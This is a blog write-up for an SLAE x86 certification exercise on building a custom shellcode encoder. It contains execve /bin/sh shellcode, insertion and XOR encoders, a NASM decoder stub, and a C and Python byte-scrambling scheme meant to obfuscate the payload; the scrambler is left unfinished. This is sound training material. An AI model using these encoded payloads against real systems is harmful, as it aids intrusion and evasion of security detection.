Introduction
This is assignment #4 of the SLAE x86 Exam objectives.
Objectives
- Create a custom encoding scheme like the “Insertion Encoder” we showed you
- PoC with using execve-stack as the shellcode to encode with your schema and execute
Notice
At the time of writing this I already had a shellcode published on PacketStorm and Exploit-db which could serve as a solution to the exercise. However, for the completeness of this blog post, and to avoid having to explain the fstenv technique, this post builds a separate encoder.
Download:
[Exploit-db]
Linux/x86 – execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)
[PacketStorm]
Linux/x86 execve /bin/sh Shellcode
70 bytes small Linux/x86 shellcode with XOR decoder stub and fstenv MMX FPU spawning a /bin/sh shell.
Building a task plan and prerequisites
Vivek provided the following Python script and NASM decoder stub to encode and decode the shellcode, respectively:
Insertion-Encoder.py:
#!/usr/bin/python
# Python Insertion Encoder
import random
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode ...'
for x in bytearray(shellcode) :
    encoded += '\\x'
    encoded += '%02x' % x
    encoded += '\\x%02x' % 0xAA
    # encoded += '\\x%02x' % random.randint(1,255)
    encoded2 += '0x'
    encoded2 += '%02x,' %x
    encoded2 += '0x%02x,' % 0xAA
    # encoded2 += '0x%02x,' % random.randint(1,255)
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
insertion-decoder.nasm:
; Filename: insertion-decoder.nasm
; Author: Vivek Ramachandran
; Website: http://securitytube.net
; Training: http://securitytube-training.com
;
;
; Purpose:
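global _start

section .text
_start:
    jmp short call_shellcode

decoder:
    pop esi                      ; esi = address of EncodedShellcode
    lea edi, [esi +1]            ; edi = next slot that receives a decoded byte
    xor eax, eax
    mov al, 1                    ; eax = offset of the first inserted 0xaa byte
    xor ebx, ebx

decode:
    mov bl, byte [esi + eax]     ; load the byte that should be the 0xaa marker
    xor bl, 0xaa
    jnz short EncodedShellcode   ; not 0xaa: end reached, run the decoded shellcode
    mov bl, byte [esi + eax + 1] ; next real shellcode byte
    mov byte [edi], bl           ; move it over the marker
    inc edi
    add al, 2                    ; advance to the next marker
    jmp short decode

call_shellcode:
    call decoder                 ; pushes the address of EncodedShellcode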
EncodedShellcode: db 0x31,0xaa,0xc0,0xaa,0x50,0xaa,0x68,0xaa,0x2f,0xaa,0x2f,0xaa,0x73,0xaa,0x68,0xaa,0x68,0xaa,0x2f,0xaa,0x62,0xaa,0x69,0xaa,0x6e,0xaa,0x89,0xaa,0xe3,0xaa,0x50,0xaa,0x89,0xaa,0xe2,0xaa,0x53,0xaa,0x89,0xaa,0xe1,0xaa,0xb0,0xaa,0x0b,0xaa,0xcd,0xaa,0x80,0xaa, 0xbb, 0xbb
The insertion encoder by Vivek inserts a 0xaa byte after each byte of the shellcode, whereas my published shellcode linked above has each byte XORed against the value 0x7d.
The code for the XOR Encoder is as follows:
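To make the insertion scheme easier to follow, here is a minimal Python 3 sketch of the encode and decode steps. It is an illustration under assumptions, not Vivek's code: the function names `insertion_encode` and `insertion_decode` are hypothetical, and the decoder only mirrors the idea of the NASM stub (stop as soon as the byte in a marker slot is not 0xaa) rather than its exact in-place copying.

```python
# Sketch only: a Python 3 illustration of the insertion idea.
# Function names are hypothetical and not part of the original scripts.
SHELLCODE = bytes.fromhex(
    "31c050682f2f7368682f62696e89e35089e25389e1b00bcd80"
)
MARKER = 0xAA      # filler byte inserted after every shellcode byte
TERMINATOR = 0xBB  # trailing bytes, as in the stub's EncodedShellcode


def insertion_encode(data: bytes) -> bytes:
    """Return data with MARKER after each byte, followed by two terminators."""
    out = bytearray()
    for b in data:
        out += bytes([b, MARKER])
    out += bytes([TERMINATOR, TERMINATOR])
    return bytes(out)


def insertion_decode(encoded: bytes) -> bytes:
    """Collect the bytes at even offsets until a marker slot is not MARKER."""
    out = bytearray()
    i = 0
    while encoded[i + 1] == MARKER:
        out.append(encoded[i])
        i += 2
    return bytes(out)
```

Because the marker is checked by position, the terminator only has to differ from the marker value for the loop to stop.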
#!/usr/bin/python
# Python XOR Encoder
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode ...'
for x in bytearray(shellcode) :
    # XOR Encoding
    y = x^0xAA
    encoded += '\\x'
    encoded += '%02x' % y
    encoded2 += '0x'
    encoded2 += '%02x,' %y
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
Then it gets decoded via the assembly as follows:
...
decoder:
pop edi
lea esi, [edi +8]
xor ecx, ecx
mov cl, 4
...
call_decoder:
call decoder
decoder_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa
EncodedShellcode: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
In Vivek’s version of the decoder stub, the jmp-call-pop technique is used: the call instruction pushes the address of decoder_value onto the stack, and pop edi retrieves it. We then iterate through EncodedShellcode 8 bytes at a time and XOR each 8 bytes of the shellcode against the value in decoder_value.
My idea is to build something of a shellcode scrambler, or at least that’s what I called it. As it would probably be too complicated to explain all of this at once, it will happen in stages. The overall idea is as follows:
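As a quick sanity check of the XOR layer, the following Python 3 sketch applies the same 0xAA key byte by byte and undoes it again. The helper name `xor_bytes` is hypothetical. It works one byte at a time instead of 8 bytes at a time, which gives the same result because every byte of decoder_value is 0xaa.

```python
# Sketch only: byte-wise XOR with the 0xAA key used in the listings above.
# The helper name is hypothetical.
SHELLCODE = bytes.fromhex(
    "31c050682f2f7368682f62696e89e35089e25389e1b00bcd80"
)
KEY = 0xAA


def xor_bytes(data: bytes, key: int = KEY) -> bytes:
    """XOR every byte with key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


encoded = xor_bytes(SHELLCODE)
decoded = xor_bytes(encoded)

# A shellcode byte equal to the key would encode to 0x00, so check for it.
has_null = 0 in encoded
```

XOR is its own inverse, which is why the same routine serves as both encoder and decoder.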
- Scramble / reposition each byte of the shellcode
  - To accomplish this, we would also need to either:
    - add an additional byte pointing to the offset for each pair repositioned, OR
    - have a predefined pattern of where each-byte-goes-where
- Add an arithmetic instruction, like XOR
- Add an additional arithmetic instruction, like increment each byte by a provided value
The order in which the above tasks are implemented could differ. Since repositioning / scrambling each byte is clearly the hardest part of the exercise, I decided to start with it and avoid having to debug the most complicated part at the end with an additional encoding layer already present.
The shellcode used for the purpose of the exercise will be the one spawning a /bin//sh execve shell, as the exercise objective requires:
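Whatever order the layers end up in, the decoder has to undo them in the reverse order. The Python 3 sketch below illustrates this with only the two arithmetic layers from the list (XOR, then an increment). The key 0xAA, the increment 0x03 and all function names are assumptions chosen for illustration, not values from the final encoder.

```python
# Sketch only: two stacked layers and their inverse, applied in reverse order.
# KEY, DELTA and the function names are hypothetical illustration values.
SHELLCODE = bytes.fromhex(
    "31c050682f2f7368682f62696e89e35089e25389e1b00bcd80"
)
KEY = 0xAA
DELTA = 0x03


def xor_layer(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def add_layer(data: bytes, delta: int) -> bytes:
    # Wrap around at 0xFF, as an 8-bit add would
    return bytes((b + delta) & 0xFF for b in data)


def sub_layer(data: bytes, delta: int) -> bytes:
    return bytes((b - delta) & 0xFF for b in data)


def encode(data: bytes) -> bytes:
    """Apply XOR first, then the increment."""
    return add_layer(xor_layer(data, KEY), DELTA)


def decode(data: bytes) -> bytes:
    """Undo the increment first, then the XOR."""
    return xor_layer(sub_layer(data, DELTA), KEY)
```

Swapping the two steps inside `decode` would not restore the original bytes in general, since XOR and addition do not commute.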
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
However, to keep track of what I am actually doing, at the beginning I’ll use a simple placeholder pattern like \xAA\xBB\xCC\xDD.
As the above shellcode is 25 bytes in length, let’s use placeholders up to the 25th letter (the letters beyond FF are not valid hex; they only mark positions):
0xAA,0xBB,0xCC,0xDD,0xEE,0xFF,0xGG,0xHH,0xII,0xJJ,0xKK,0xLL,0xMM,0xNN,0xOO,0xPP,0xQQ,0xRR,0xSS,0xTT,0xUU,0xVV,0xWW,0xXX,0xYY
Next to each shellcode byte, I will add another byte containing the position of that byte in the original shellcode. So if \x31 is at the beginning of the shellcode, I add its position right after it, numbering from 01 rather than 00 to avoid introducing a null byte.
0xAA,0x01, 0xBB, 0x02...
We start from the original execve shellcode:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
After each byte, we add its position, using the values from 1 to 25 in hex:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19
Of course, this doubles the size of the shellcode, but since the goal here is obfuscation rather than a small buffer size, we do not care about this.
The following C program will put the offsets as explained in a variable called shellcode_scrambled and output the result:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* execve /bin//sh shellcode, 25 bytes, contains no null bytes */
const unsigned char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
/* position of each shellcode byte, starting at 1 to avoid a null byte */
const unsigned char pos[] =
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19";

int main(void)
{
    size_t len = strlen((const char *)shellcode);
    size_t i, a;
    /* two output bytes (value, position) for every shellcode byte */
    unsigned char *shellcode_scrambled = malloc(len * 2);
    if (shellcode_scrambled == NULL)
        return 1;
    for (i = 0, a = 0; a < len; i += 2, a++)
    {
        shellcode_scrambled[i] = shellcode[a];  /* original byte */
        shellcode_scrambled[i + 1] = pos[a];    /* its position */
    }
    printf("\n");
    for (i = 0; i < len * 2; i++)
        printf("\\x%.02x", shellcode_scrambled[i]);
    printf("\n");
    free(shellcode_scrambled);
    return 0;
}
The resulting shellcode:
\x31\x01\xc0\x02\x50\x03\x68\x04\x2f\x05\x2f\x06\x73\x07\x68\x08\x68\x09\x2f\x0a\x62\x0b\x69\x0c\x6e\x0d\x89\x0e\xe3\x0f\x50\x10\x89\x11\xe2\x12\x53\x13\x89\x14\xe1\x15\xb0\x16\x0b\x17\xcd\x18\x80\x19
Each byte now has its index appended, so we can shuffle the 2-byte pairs in a totally random order. This is an additional task on its own, as we have to keep track of which byte pairs have already been used and which have not in order to keep the shellcode consistent.
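One possible way to handle the bookkeeping is to shuffle the list of pairs as a whole, since a shuffle is a permutation and therefore uses every pair exactly once. The Python 3 sketch below shows that idea together with the matching restore step. It is an assumption about how the scrambling could be done, not the finished encoder, and the function names `tag_positions`, `scramble` and `unscramble` are hypothetical.

```python
# Sketch only: tag each byte with its 1-based position, shuffle the pairs,
# and restore the original order from the position bytes.
# Function names are hypothetical.
import random

SHELLCODE = bytes.fromhex(
    "31c050682f2f7368682f62696e89e35089e25389e1b00bcd80"
)


def tag_positions(data: bytes) -> bytes:
    """Append the 1-based position after every byte (value, position)."""
    out = bytearray()
    for position, value in enumerate(data, start=1):
        out += bytes([value, position])
    return bytes(out)


def scramble(tagged: bytes, seed=None) -> bytes:
    """Shuffle the 2-byte pairs; each pair appears exactly once."""
    pairs = [tagged[i:i + 2] for i in range(0, len(tagged), 2)]
    random.Random(seed).shuffle(pairs)
    return b"".join(pairs)


def unscramble(scrambled: bytes) -> bytes:
    """Put every value back at the slot named by its position byte."""
    out = bytearray(len(scrambled) // 2)
    for i in range(0, len(scrambled), 2):
        value, position = scrambled[i], scrambled[i + 1]
        out[position - 1] = value
    return bytes(out)
```

With a single position byte starting at 1, this layout can only address shellcode of up to 255 bytes.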
*** [WORK IN PROGRESS] ***
Download
execve /bin/sh (fstenv eip GetPC technique) Shellcode (70 bytes, xor encoded):
PacketStormSecurity:
https://packetstormsecurity.com/files/163057/Linux-x86-execve-bin-sh-Shellcode.html
Exploit-db:
https://www.exploit-db.com/shellcodes/49976
Github:
https://github.com/d7x/shellcode/blob/main/linux/mmx-xor-decoder_eip.c
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-34669